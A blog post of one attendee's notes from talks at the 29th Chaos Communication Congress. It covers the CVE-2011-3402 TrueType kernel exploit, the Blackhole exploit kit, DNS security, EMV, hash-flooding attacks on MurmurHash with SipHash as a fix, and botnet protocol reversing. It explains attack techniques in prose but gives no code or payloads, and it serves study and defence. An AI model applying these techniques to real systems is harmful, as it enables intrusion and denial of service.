Miloslav Trmač: Notes from 29th Chaos Communication Congress

CVE-2011-3402 technical analysis

= embedded font with a kernel exploit.

Earliest use in 2010, discovered in Duqu in 2011; now a fully working exploit is used in the Cool and BlackHole exploit kits.
Font rendering: win32k.sys executes TrueType font programs in ring 0 (motivation per NT 4.0 documentation: "faster operation and reduced memory requirements").
"CVT" = array of point values (a "variable storage area")
The TrueType VM includes a function for bitmap merging while offsetting them (to do kerning), which misses a bound check => used to set a single bit in the length of the CVT, making it possible to overwrite the global VM state which follows the CVT in memory. This is memory-layout independent: in the TTF VM code, there is a loop that flips a bit in the global state and searches for a CVT offset though which it is visible => uses the TTF VM to help with the exploit!
Then the VM code overwrites a function pointer in the global data (which is supposed to point to one of 6 predefined rounding functions).
The TrueType implementation (probably?) hasn't changed over the years => structure layout haven't changed over the times.
All memory accesses are relative, the VM loop detects a precise offset => ASLR doesn't help.
Font metadata in exploit: "copyright 2003 showtime inc. dexter regular" (reference to a TV show?).

A note from the lightning talks

"Help a reporter out": You can give interview on anything if a reporter needs last-minute experts = advertising for free.

Analytical summary of the Blackhole exploit kit

~12 PHP scripts that tie together various exploits, together with reporting/management UI
PHP => platform independent (also requires MySQL, IonCube)
It seems that many of the exploits were written by someone else, and (based on a public argument) rented (and unpaid) rather than purchased (eventually dropped in 2.0, replaced by other exploits).
"Cool exploit kit" very similar - ripped off blackhole, or a new brand by the same author?
There is a tool for brute-forcing Blackhole admin passwords :) => Blackhole added a captcha
Author? "Paunch" There is public contact info / live tech support contact, and a public fee schedule, e.g. $1500/year.
Source code was leaked == copied from a running server; some files missing, IonCube-obsfuscated.
Exploit URL: used to be .../main.php?id=[md5 of time of exploit run] ... nowadays a little more randomized, but most of the content is always the same, with various strings unique to the exploit.

Overview of secure name resolution

Largely an overview of various approaches.

UDP spoofing: need to guess source port, transaction ID (~31 bits) => difficult for "write-only" attackers, but a local attacker that can read the requests can do it easily enough.

DNSSEC:

Signs records, not responses, but NXDOMAIN isn't a record=> signed NSEC response "no names between A1 and A2", which allows zone disclosure => NSEC3: "no names between hashes H1 and H2" => have hashes of all names, need an (off-line) dictionary attack to get names.
No existing OS stub resolver does validation (Windows interprets results by a DNS recursive resolver, but that's all).
Failures look like general DNS errors, user can't override them; providers blamed->Comcast is maintaining a list of failures to ignore.
Depends on accurate time->DoS risk, and NTP pools depends on DNS.
DoS amplification, but countermeasures exist.
ISP wild-card redirect: still possible for a TLD operator (Verisign), or when the ISP validating for the user.
Root zone trust: Verisign has the zone key, this is signed by an ICANN key, which has 4 HSM with copies, authenticated with 3/7 smart cards -> 3/7 physical keys

DNSCurve: on-line signatures, forwarders impossible. All 300 root servers would have to have the private key (ICANN doesn't want this); higher CPU load requirements.

Namecoin=modified Bitcoin, with every client having a full name database (=> crazy?)

EMV walkthrough

For connecting a smartcard reader, use PC/SC; you don't need a specialized "EMV" reader - it's all ISO 7816.

Nothing new otherwise, just a walkthrough through the publicly available EMV standard.

Hash-flooding DoS reloaded attacks and defenses

Attack first suggested in 1989 by Solar Designer in Phrack. Published in 2003 at USENIX. Another publication in 2011.

Possible countermeasures:

Use a "safe" structure, e.g. a balanced tree, for handling collisions.
Just discard cache entries that would cause a large collision list (if discarding data is OK).
Not: use SHA-3: a) it's slow, b) it doesn't work - SHA-3 is collision resistant, but (SHA-3 mod (small hash table size)) is not collision resistant.

Common response: use an application-specific secret key to randomize the hash function

MurmurHash 2: block processing is independent of seed value; the state is set to seed, then updated by incoming data => we can create pairs of input blocks that cancel each other WRT the hash state => for 16n bytes, can create 2ⁿ collisions, irrespective of the secret seed.

MurmurHash 3 (introduced as a response to the attack), we can do the same thing.

Trying this attack:

on Rails: need the string to pass some format checks, can just brute-force for acceptable values. For www-form-urlencoded data, Rails limits the total number of parameters => safe, but JSON data is not protected. Lesson: patching this kind of vulnerability in applications doesn't work: too much code, too many opportunities for loopholes.
on Java: the only issue is that you need to construct "char" (16-bit) character strings.

Both cases reported, with CVEs [what about other languages?] http://emboss.github.com/blog. Reactions: No response from Java; The Ruby problem was fixed in cruby, jruby, rubinius.

Possible fixes:

"Don't use MurmurHash"?
- CityHash: even weaker than MurmurHash - can find more collisions for the same
  length of string.
- Python's hash(): a little better than MurmurHash, but still not good: uses hash input as a key to encrypt the seed, takes this as a hash result; so if we can see the hash value, we can just decrypt the value to get the seed - and randimization is optimal anyway.
- Marvin32 (.NET): no results for now, looking at it
Introduced SipHash: "fast short-input PRF". https://131002.net/siphash/
- rigorous security analysis (peer-reviewed research paper).
- 256-bit state, 128-bit key. Can use an
  arbitrary number of "rounds" for compression, or for finalization =>
  SipHash-X-Y naming. Proposing SipHash-2-4 for general use.
- Strength claims: ~2¹²⁸ key recovery, ~2¹⁹² state recovery, ~2¹²⁸ "internal-collision forgery". With ~2^s effort probability of forgery 2^s-64.
- ~1200-200 cycles per 8-64 bytes, 1.44 cycles/byte for long messages
  => < 2x slower than CityHash, SpokyHash.
- 18 third-party implementations in 8 days already.
- Now used in Perl 5, cruby, jruby, others
Why not use other cryptographic hashes? SHA-3 is much slower than siphash. "Blake" is 2-3x slower than SipHash.

The future of protocol reversing and simulation applied on ZeroAccess botnet

Introduces "Netzob":

Infers protocol "vocabulary" and "grammar"
Can simulate a client/server/fuzzing
Can export the analyzed protocol in various formats, including a Wireshark dissector.

ZeroAccess botnet: 2 ways to gain money: click fraud and bitcoin mining

Protocol inference:

Split messages to fields:
- Find fixed-width fixed/variable fields
- Find delimiter-based fields
- "Sequence alignment" - find maximal-length common sequences (=> maximal-length fixed fields) for the sample, then convert into a regexp.
- Supports hierarchical message format, with each level using a different
  method
Cluster similar messages. Similarity = "ratio of dynamic fields / bytes", "ratio of common dynamic bytes". Use UPGMA hierarchical clustering.
Find values that vary depending on context (IP address, time, ...)

Encoding (XOR, ASN.1), encryption: can define transformation functions, and add more functions; apparently must be selected manually.

Finding field relations automatically: Try various transformations of a field (or a field combination), then use "maximal information coefficient" for finding correlated values. Includes environmental context as possible information sources.

Protocol rules: collect message sequences => build automata (with probability, reaction time on arcs). Then Angluin L*a to infer a grammar.

There is GUI to help with all of this, interactively naming fields / changing display format and the like.

Miloslav Trmač

Friday, January 4, 2013

Notes from 29th Chaos Communication Congress – day 3